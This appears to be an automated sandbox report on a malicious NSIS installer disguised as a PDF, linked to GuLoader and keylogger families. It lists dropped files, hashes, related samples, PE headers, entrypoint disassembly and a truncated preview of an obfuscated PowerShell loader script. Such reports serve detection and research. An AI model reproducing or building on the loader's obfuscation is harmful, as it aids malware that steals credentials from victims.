                                                                                                                                                              SPP_14667098030794_8611971920#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                              • 142.250.181.129
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 142.250.181.129
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              6ufJvua5w2.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                                                                                                                                                              • 142.250.181.129
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dllfile.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                Shipping documents 000022999878999800009999.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                  Ze1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                    Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                      4hIPvzV6a2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            3Dut8dFCwD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              Ms63nDrOBa.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):53158
                                                                                                                                                                                  Entropy (8bit):5.062687652912555
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                                                  MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                                                  SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                                                  SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                                                  SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                  Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):711659
                                                                                                                                                                                  Entropy (8bit):7.810658317463929
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:IfL/UfibuJ2zMMzztVZK+u5YBCtKlQyYefZKSxA340ryKhzJ:IfL8fibuJ2/JVZZuaBCtjexKj3vR
                                                                                                                                                                                  MD5:42B3EEFF606C41053B2B30E6DF1BAA87
                                                                                                                                                                                  SHA1:8957AC95D71567CCF7D0EFC28DDCC944352308D0
                                                                                                                                                                                  SHA-256:F3B82A629B1EFF8B49EDCFB38F2D0CBD0EF366A59A97264EB7B86373A45588C4
                                                                                                                                                                                  SHA-512:2646E4CD32E39C285BE65EECAB4BC6C6E92A1B5E5992BA53B5D4F062DDCDE1B1A596773D2976442BE6ED3BE5D36144F4CF23CAF665B248909AA1AEE316B453B8
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................@...k...........................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....k...@...l..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                  Process:C:\Users\user\Desktop\678763_PDF.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7168
                                                                                                                                                                                  Entropy (8bit):5.2959870663251625
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                                                                                                                                                                  MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                                                                                                                                                                  SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                                                                                                                                                                  SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                                                                                                                                                                  SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Shipping documents 000022999878999800009999.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Ze1Ueabtx5.img, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Ms63nDrOBa.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\678763_PDF.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (4127), with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):70030
                                                                                                                                                                                  Entropy (8bit):5.186054392297633
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:VHodzxpVgidFiCnSE/aLMzGhqwkbNaHcqWGrkdw9NQyVcZ:1odzffdACnSwyQWfodwEyaZ
                                                                                                                                                                                  MD5:768076BC07A8269777ECA668FFAD03DB
                                                                                                                                                                                  SHA1:F45FE94624260D24D11FD08CEF836613C7B6B6DE
                                                                                                                                                                                  SHA-256:5DD1C6B30BE06F7D0B330DB92B5CE440F11ABD4D0E0574325054AA32E6704373
                                                                                                                                                                                  SHA-512:E3118FCF36589362057D930E89B8E65D8F5E5F83CD3F1C105EA23A86633CAD45D063D4E59A7E2E88B301FBAD79B2B250C18B4188DB1B2469E7989719F6BA0DA9
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:$Caulocarpic=$Redaktionscheferne;.....<#Tyrannisers Recrementitious Unitised Skibssidernes Nyvurderingers Wetnesses #>..<#Nykritikkernes Ransager Blgetoppe #>..<#Milioline Yvonna Trodse Voves #>..<#Middelstandenes Supernaturalise Rancourous #>..<#Judicatory Brochen Boomet Megacity Magikerne #>..<#Kulinariskes Humorlesses Lukkelser overdkning Glenny #>...$protogaster = @'.Electro. achas$BiosfreVUnscoldiKong blnInddatadMottoetm Lnu jvaSkuringg ucketfeBenzintr NonhaziSki per=Cellpho$ErhvervSF kkesiw Mythope HempieeKnaphedpCalab ruFintmaspTong.eb;S rpuli. ,edlemfSy domsuGennemtnTrop.vec archmtHovedsaiFimre eoDoublewnArago,s KursdifSPr.conqeA terudnScle.otsGermansoGunarchmStar.lioBerge ebexcalfaiscrollwl Oms ndiAivrabatAnvendeyEurythe Kvotas(Ap lika$MidshipDDetailgoTjenestsI,foliaeUnwi.ldrNonaboriAnisejonsvmmedygGenleveeInstrukn UtydelsPhiloso, Delila$AndesinUReaumurfDiminutsp dsyas)Under.i fo eclo{ Borreb. Be.ive. trykvr$SeraphiiParasysd Deis iiClaybouoKontohat Defkath FlygtneRegreasr
                                                                                                                                                                                  Process:C:\Users\user\Desktop\678763_PDF.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):310013
                                                                                                                                                                                  Entropy (8bit):7.687302488366902
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:HDzFj/9nG6bEzOBZXWAOngd9+FyqlnHuNepIjgppyDkvLN:jzzGg73Jd+yqlHUeW8DyDw
                                                                                                                                                                                  MD5:68203BE6AECA0041E89C1B3AD79D66AB
                                                                                                                                                                                  SHA1:9FDFCE5EF08C4CEA42305DC42AAFAC600EDFBDCF
                                                                                                                                                                                  SHA-256:F96640C810B03B5701A67EF0B8916B5D4D3D47CB6BEFED3337462E2F6FF2711C
                                                                                                                                                                                  SHA-512:FD594BEC40CBF4DB10A593B94172856429F9DB80A021A54A6674FCD6861D34CF28CA0CFB593D5C0671E82BAEAE96A60BFD66F35137D4FFF7016880951665ACD0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....................................n.....]..i...Y...^..||.(............W....]].|||..................``.%%........2.S...............7.nn.............HH...................}}}}........e...............^.......NN.................222........0............n.......e...}}.......!.........."""....r.55.......................0...yy.......................!!!.t....___.....................................3.b.........??................................5.........vv..nnn........(................pp.....P.EE.rr.**.=..............................qqqqq...... ............aaa..N.......................................v...............gggg...[..............a......g...................UUU..~~~~~...ddd.&.......{{.......r.ee.....www...............EE....................K...............................$$....................PP...KKK...........%%%......YYYY..........".....xxx...................-.......RR........................YYYY..........XX....................................777.D.....:..##..................hh...3
                                                                                                                                                                                  Process:C:\Users\user\Desktop\678763_PDF.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):408232
                                                                                                                                                                                  Entropy (8bit):1.259531155482668
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:c3mYm00dVSgDT+afxNr3DwNJbiI7MrrtHFmYA3vCiuv/BQanrlhqkroqqL7jCzHs:X00FVwDotSeUpjvxXDpih4YZtc
                                                                                                                                                                                  MD5:CCE82C77E237537520FBD52B63A51E58
                                                                                                                                                                                  SHA1:D902CE813446431FFECA35141FCD9825D4DBEF4D
                                                                                                                                                                                  SHA-256:0F7DCA6879E497104B6813228391DECF7D6270D90FC887F1B9384B5E5B438221
                                                                                                                                                                                  SHA-512:2F0C0A6FBA09D19D72828589A658FEECD9E0A03F2B8C3DCA046AACFCB887375D538452D59DB24EDB8D17199AC3CA43ED1373262B6206B30F55F00ED159BAFEFE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.......................................................................................P................0......................................................(.....................................................................................S.............................r..-.................n...................]....................................|e................`......................{.................................J....................*......J............................]..................................................u..............................................................................................................\........................:...............................................................M..........................................................................................................................l..............l....8...........9............................................................2....=.........................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\678763_PDF.exe
                                                                                                                                                                                  File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 55
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):379198
                                                                                                                                                                                  Entropy (8bit):1.2531245811733491
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:K2a+g7Qqek5bnEKRY3dJkKoYZrcvYy5oXBfwokPtW:TrvqLJnudnttcvARYtW
                                                                                                                                                                                  MD5:B4BD98AA231F431FA2C0B32C041971DA
                                                                                                                                                                                  SHA1:D58868B02A5DEDACC33CE7EB0658201EF5A29766
                                                                                                                                                                                  SHA-256:E34CA004CCB16A80E49010B584428A08AB3D89FCA778567346D26F84FF892962
                                                                                                                                                                                  SHA-512:69CD7AF495A1DC3F612B456A2ABB2FE9F6FF556E73DA0707B26325E08AA94138FB094DAA4A35E7C7BCDCE81FDF118A9A4C664632523CEED16765B2E74FCBDD05
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:........7....................................................$................................................n.........b...............S...............................................~%..........................................................................K................................................._....w.......*e.......b.'.....M.......].....................................................[.......................................................................u...G.............G.....................................F!.......................w...................................................................................r.....................................................F................>.s.....................................2......E..............g............................................................C.>...............A.........................................................................................................................S..........................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\678763_PDF.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):495136
                                                                                                                                                                                  Entropy (8bit):1.2514913232658866
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:jfLDH9Jx2uiEaWIwEfM+5EUPDohS/uF1bXyCOAqRu:TsIaV+CDTuF1bizAT
                                                                                                                                                                                  MD5:F28B6FB0CA8AF14D2913C43CBEA08754
                                                                                                                                                                                  SHA1:0BA129FCFA0131A4EFCDF2B1952F4FAE59604720
                                                                                                                                                                                  SHA-256:F1C35573809F92DC65D2EB2EBC3CD9D0C78E75E73ED741E52BAECAE2FC02DD70
                                                                                                                                                                                  SHA-512:523F6E0A8E879F13AB9D7BAE0E7A7E0157ABB0A8B1240F0EC0B5FF84C26A3F1519535DFAD9170BC6E887AE70DE03B939148D629695DB71DC53DF5A75AC2E2757
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...n.............................Y.....................!.......j.........[...............R................+.........M............................................................=..........................................................j....g.......9..........................&....................................s.......................x.......{............-............................................V......................u......................................................................................F.........y..................V.............\.......................`....................]..........e.......1.........6.......M................+...................................S...e..............................................g..........................Z.....26............C...&...............................................-...................................................................)..................................................................................G......
                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                  Entropy (8bit):7.810658317463929
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                  File name:678763_PDF.exe
                                                                                                                                                                                  File size:711'659 bytes
                                                                                                                                                                                  MD5:42b3eeff606c41053b2b30e6df1baa87
                                                                                                                                                                                  SHA1:8957ac95d71567ccf7d0efc28ddcc944352308d0
                                                                                                                                                                                  SHA256:f3b82a629b1eff8b49edcfb38f2d0cbd0ef366a59a97264eb7b86373a45588c4
                                                                                                                                                                                  SHA512:2646e4cd32e39c285be65eecab4bc6c6e92a1b5e5992ba53b5d4f062ddcde1b1a596773d2976442be6ed3be5d36144f4cf23caf665b248909aa1aee316b453b8
                                                                                                                                                                                  SSDEEP:12288:IfL/UfibuJ2zMMzztVZK+u5YBCtKlQyYefZKSxA340ryKhzJ:IfL8fibuJ2/JVZZuaBCtjexKj3vR
                                                                                                                                                                                  TLSH:68E412C07C5144A3EEA67973F9BA1C6017A32D6763D9331F13B4726829A3213971FA1B
                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........
                                                                                                                                                                                  Icon Hash:539b8caeaee66c11
                                                                                                                                                                                  Entrypoint:0x403532
                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                  Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                  Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                                                                                                                  Instruction
                                                                                                                                                                                  sub esp, 000003F8h
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  push esi
                                                                                                                                                                                  push edi
                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                  pop edi
                                                                                                                                                                                  xor ebp, ebp
                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                  mov dword ptr [esp+20h], ebp
                                                                                                                                                                                  mov dword ptr [esp+18h], 0040A2D8h
                                                                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                                                                  call dword ptr [004080A4h]
                                                                                                                                                                                  mov esi, dword ptr [004080A8h]
                                                                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                                                                  push eax
                                                                                                                                                                                  mov dword ptr [esp+4Ch], ebp
                                                                                                                                                                                  mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                                                  mov dword ptr [esp+00000150h], ebp
                                                                                                                                                                                  mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                                                  call esi
                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                  jne 00007FF01109ECAAh
                                                                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                                                                  mov dword ptr [esp+34h], 00000114h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call esi
                                                                                                                                                                                  mov ax, word ptr [esp+48h]
                                                                                                                                                                                  mov ecx, dword ptr [esp+62h]
                                                                                                                                                                                  sub ax, 00000053h
                                                                                                                                                                                  add ecx, FFFFFFD0h
                                                                                                                                                                                  neg ax
                                                                                                                                                                                  sbb eax, eax
                                                                                                                                                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                                                                  not eax
                                                                                                                                                                                  and eax, ecx
                                                                                                                                                                                  mov word ptr [esp+00000148h], ax
                                                                                                                                                                                  cmp dword ptr [esp+38h], 0Ah
                                                                                                                                                                                  jnc 00007FF01109EC78h
                                                                                                                                                                                  and word ptr [esp+42h], 0000h
                                                                                                                                                                                  mov eax, dword ptr [esp+40h]
                                                                                                                                                                                  movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                                                                  mov dword ptr [004347B8h], eax
                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                  mov ah, byte ptr [esp+38h]
                                                                                                                                                                                  movzx eax, ax
                                                                                                                                                                                  or eax, ecx
                                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                                  mov ch, byte ptr [esp+00000148h]
                                                                                                                                                                                  movzx ecx, cx
                                                                                                                                                                                  shl eax, 10h
                                                                                                                                                                                  or eax, ecx
                                                                                                                                                                                  movzx ecx, byte ptr [esp+0000004Eh]
                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x16bf0.rsrc
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                  .text0x10000x68d80x6a00742185983fa6320c910f81782213e56fFalse0.6695165094339622data6.478461709868021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .rdata0x80000x14640x1600a995b118b38426885fc6ccaa984c8b7aFalse0.4314630681818182data4.969091535632612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .data0xa0000x2a8180x6009a9bf385a30f1656fc362172b16d9268False0.5247395833333334data4.172601271908501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .ndata0x350000x1f0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .rsrc0x540000x16bf00x16c004361f60a54e8593e396ed02385fb8e51False0.43695269574175827data5.337867037994319IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
